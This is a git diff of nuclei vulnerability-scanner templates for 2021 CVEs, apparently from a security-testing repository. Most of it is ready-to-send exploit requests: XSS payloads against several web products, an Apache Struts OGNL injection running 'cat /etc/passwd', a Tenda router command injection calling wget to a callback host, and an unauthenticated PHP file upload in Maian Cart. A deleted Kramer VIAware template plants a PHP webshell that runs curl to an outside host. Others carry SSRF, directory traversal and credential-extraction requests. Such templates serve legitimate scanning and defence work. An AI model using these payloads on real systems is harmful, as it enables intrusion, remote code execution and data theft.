CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.80 + cve-id: CVE-2021-29490 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}" + - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2021/cve-2021-3002.yaml b/nuclei-templates/CVE-2021/cve-2021-3002.yaml new file mode 100644 index 0000000000..781aba2d77 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-3002.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-3002 + +info: + name: Seo Panel 4.8.0 - Post based Reflected XSS + author: edoardottt + severity: medium + description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-3002 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 + - http://www.cinquino.eu/SeoPanelReflect.htm + tags: cve,cve2021,seopanel,xss + +requests: + - raw: + - | + POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" + - "seopanel" + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-30049.yaml b/nuclei-templates/CVE-2021/cve-2021-30049.yaml deleted file mode 100644 index 5903e45821..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-30049.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-30049 - -info: - name: SysAid Technologies 20.3.64 b14 Reflected XSS - author: daffainfo - severity: medium - description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI. - reference: - - https://eh337.net/2021/03/30/sysaid/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049 - tags: cve,cve2021,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-30049 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-30151.yaml b/nuclei-templates/CVE-2021/cve-2021-30151.yaml new file mode 100644 index 0000000000..c1251e9592 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-30151.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-30151 + +info: + name: CVE-2021-30151 + author: DhiyaneshDk + severity: medium + description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + reference: + - https://github.com/mperham/sidekiq/issues/4852 + - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 + tags: cve,cve2021,xss,sidekiq + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-30151 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "onmouseover=\"alert('nuclei')" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-3017.yaml b/nuclei-templates/CVE-2021/cve-2021-3017.yaml deleted file mode 100644 index 5a60c6d460..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-3017.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-3017 - -info: - name: Intelbras WIN 300/WRN 342 Disclosure - author: pikpikcu - severity: high - description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. - reference: - - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - tags: cve,cve2021,exposure,router - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-3017 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.asp" - - matchers-condition: and - matchers: - - type: word - words: - - 'def_wirelesspassword =' - - 'Roteador Wireless' - part: body - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' diff --git a/nuclei-templates/CVE-2021/CVE-2021-3019.yaml b/nuclei-templates/CVE-2021/cve-2021-3019.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3019.yaml rename to nuclei-templates/CVE-2021/cve-2021-3019.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-30497.yaml b/nuclei-templates/CVE-2021/cve-2021-30497.yaml deleted file mode 100644 index 0c94b9f41b..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-30497.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2021-30497 - -info: - name: Ivanti Avalanche Directory Traversal - author: gy741 - severity: high - description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder - reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ - tags: cve,cve2021,avalanche,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "for 16-bit app support" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-31537.yaml b/nuclei-templates/CVE-2021/cve-2021-31537.yaml deleted file mode 100644 index 10abaf9ffe..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-31537.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-31537 - -info: - name: SIS-REWE GO version 7.5.0/12C XSS - author: geeknik - description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). - reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ - severity: medium - tags: cve,cve2021,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-31537 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "SIS-REWE" - condition: and - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-31602.yaml b/nuclei-templates/CVE-2021/cve-2021-31602.yaml deleted file mode 100644 index 90526428dc..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-31602.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-31602 - -info: - name: Pentaho <= 9.1 Authentication Bypass of Spring APIs - author: pussycat0x - severity: high - description: An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials. - reference: - - https://seclists.org/fulldisclosure/2021/Nov/13 - - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software - - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf - metadata: - shodan-query: 'Pentaho' - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-31602 - cwe-id: CWE-863 - tags: cve,cve2021,pentaho,auth-bypass,spring - -requests: - - method: GET - path: - - "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js" - - "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Anonymous' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31682.yaml b/nuclei-templates/CVE-2021/cve-2021-31682.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-31682.yaml rename to nuclei-templates/CVE-2021/cve-2021-31682.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-31755.yaml b/nuclei-templates/CVE-2021/cve-2021-31755.yaml deleted file mode 100644 index 5b079c43b2..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-31755.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-31755 - -info: - name: Tenda Router AC11 RCE - description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - author: gy741 - severity: critical - reference: - - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: cve,cve2021,tenda,rce,oast,router,mirai - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-31755 - cwe-id: CWE-787 - -requests: - - raw: - - | - POST /goform/setmac HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}}/index.htmlr - Content-Type: application/x-www-form-urlencoded - - module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2021/cve-2021-31805.yaml b/nuclei-templates/CVE-2021/cve-2021-31805.yaml new file mode 100644 index 0000000000..2c04b99d04 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-31805.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-31805 +info: + name: Apache Struts2 S2-062 - Remote Code Execution + author: taielab + severity: critical + description: The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation. + reference: + - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 + tags: cve,cve2021,apache,rce,struts,struts2 + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF + Content-Length: 1095 + + ------WebKitFormBoundaryl7d1B1aGsV2wcZwF + Content-Disposition: form-data; name="id" + + %{ + (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + + (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + + (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + + (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) + } + + ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— + + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2021/cve-2021-32172.yaml b/nuclei-templates/CVE-2021/cve-2021-32172.yaml new file mode 100644 index 0000000000..06a2dbdc96 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-32172.yaml @@ -0,0 +1,56 @@ +id: CVE-2021-32172 + +info: + name: Maian Cart 3.8 preauth RCE + author: pdteam + severity: critical + description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8. + reference: + - https://dreyand.github.io/maian-cart-rce/ + - https://github.com/DreyAnd/maian-cart-rce + - https://www.maianscriptworld.co.uk/critical-updates + - https://nvd.nist.gov/vuln/detail/CVE-2021-32172 + tags: cve,cve2021,rce,unauth,maian + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32172 + cwe-id: CWE-862 + +requests: + - raw: + - | + GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, /; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e + + - | + GET /product-downloads/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + extractors: + - type: regex + name: hash + internal: true + group: 1 + regex: + - '"hash"\:"(.*?)"\,' + + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_3, "{{randstr_1}}")' + - "status_code_3 == 200" + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-32618.yaml b/nuclei-templates/CVE-2021/cve-2021-32618.yaml deleted file mode 100644 index 1b6f758626..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-32618.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2021-32618 - -info: - name: Flask Open Redirect - author: 0x_Akoko - severity: medium - description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. - reference: - - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - - https://github.com/Flask-Middleware/flask-security/issues/486 - - https://nvd.nist.gov/vuln/detail/CVE-2021-32618 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-32618 - cwe-id: CWE-601 - tags: cve,cve2021,redirect,flask - -requests: - - method: GET - path: - - '{{BaseURL}}/login?next=\\\example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-32682.yaml b/nuclei-templates/CVE-2021/cve-2021-32682.yaml deleted file mode 100644 index 5467595d82..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-32682.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-32682 - -info: - name: elFinder - Multiple vulnerabilities leading to RCE - author: smaranchand - severity: critical - tags: cve,cve2021,elfinder,misconfig,rce,oss - description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. - reference: - - https://smaranchand.com.np/2022/01/organization-vendor-application-security/ - - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities - - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr - - https://nvd.nist.gov/vuln/detail/CVE-2021-32682 - remediation: Update to elFinder 2.1.59 - metadata: - github: https://github.com/Studio-42/elFinder - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/elfinder/elfinder-cke.html" - - "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html" - - "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html" - - "{{BaseURL}}/assets/elFinder/elfinder.html" - - "{{BaseURL}}/backend/elfinder/elfinder-cke.html" - - "{{BaseURL}}/elfinder/elfinder-cke.html" - - "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html" - - "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html" - - "{{BaseURL}}/uploads/elfinder/elfinder-cke.html" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "elfinder" - - "php/connector" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-3293.yaml b/nuclei-templates/CVE-2021/cve-2021-3293.yaml deleted file mode 100644 index ae0a847728..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-3293.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-3293 - -info: - name: emlog 5.3.1 Path Disclosure - description: "emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file." - author: h1ei1 - severity: high - reference: - - https://github.com/emlog/emlog/issues/62 - - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-3293 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-3293 - cwe-id: CWE-22 - tags: cve,cve2021,emlog,fpd - -requests: - - raw: - - | - GET /t/index.php?action[]=aaaa HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Warning" - - "on line" - - "expects parameter" - condition: and - -# Enhanced by mp on 2022/04/04 diff --git a/nuclei-templates/CVE-2021/cve-2021-3297.yaml b/nuclei-templates/CVE-2021/cve-2021-3297.yaml new file mode 100644 index 0000000000..801f92c40d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-3297.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-3297 +info: + name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass + description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. + author: gy741 + severity: high + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 + - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass + tags: cve,cve2021,zyxel,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-3297 + cwe-id: CWE-287 + +requests: + - raw: + - | + GET /status.htm HTTP/1.1 + Host: {{Hostname}} + Cookie: language=en; login=1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Running Time" + - "Firmware Version" + - "Firmware Build Time" + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-33221.yaml b/nuclei-templates/CVE-2021/cve-2021-33221.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-33221.yaml rename to nuclei-templates/CVE-2021/cve-2021-33221.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-34370.yaml b/nuclei-templates/CVE-2021/cve-2021-34370.yaml new file mode 100644 index 0000000000..bfc7221009 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34370.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-34370 + +info: + name: Accela Civic Platform 21.1 - Open Redirect & XSS + author: 0x_Akoko + severity: medium + description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 + reference: + - https://www.exploit-db.com/exploits/49990 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 + - https://www.accela.com/civic-platform/ + tags: xss,redirect,cve,cve2021,accela + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/CVE-2021/cve-2021-34473.yaml b/nuclei-templates/CVE-2021/cve-2021-34473.yaml new file mode 100644 index 0000000000..68a4fd2b38 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-34473.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-34473 + +info: + name: Exchange Server SSRF (ProxyShell) + author: arcc,intx0x80,dwisiswant0,r3dg33k + severity: critical + description: | + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + reference: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 + tags: cve,cve2021,ssrf,rce,exchange + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34473 + +requests: + - method: GET + path: + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' + + matchers: + - type: word + part: body + condition: or + words: + - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" + - "Exchange MAPI/HTTP Connectivity Endpoint" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-36356.yaml b/nuclei-templates/CVE-2021/cve-2021-36356.yaml deleted file mode 100644 index 8dbb5f01fd..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-36356.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-36356 - -info: - name: Kramer VIAware - Remote Code Execution - author: gy741 - severity: critical - description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. - remediation: | - Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. - reference: - - https://www.exploit-db.com/exploits/50856 - - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 - - https://write-up.github.io/kramerav/ - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-36356 - cwe-id: CWE-434 - epss-score: 0.90558 - epss-percentile: 0.98752 - cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: kramerav - product: viaware - tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav -variables: - useragent: "{{rand_base(6)}}" - -http: - - raw: - - | - POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - - | - GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - http - - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" -# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-36450.yaml b/nuclei-templates/CVE-2021/cve-2021-36450.yaml new file mode 100644 index 0000000000..9b1384b83b --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-36450.yaml @@ -0,0 +1,73 @@ +id: CVE-2021-36450 + +info: + name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting + author: atomiczsec + severity: medium + description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization. + reference: + - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 + - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + - http://verint.com + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 + - https://medium.com/%401nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-36450 + cwe-id: CWE-79 + epss-score: 0.00229 + epss-percentile: 0.61111 + cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: verint + product: workforce_optimization + shodan-query: title:"Verint Sign-in" + tags: cve2021,cve,xss,verint + +http: + - raw: + - | + GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 + Host: {{Hostname}} + - | + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">

Test

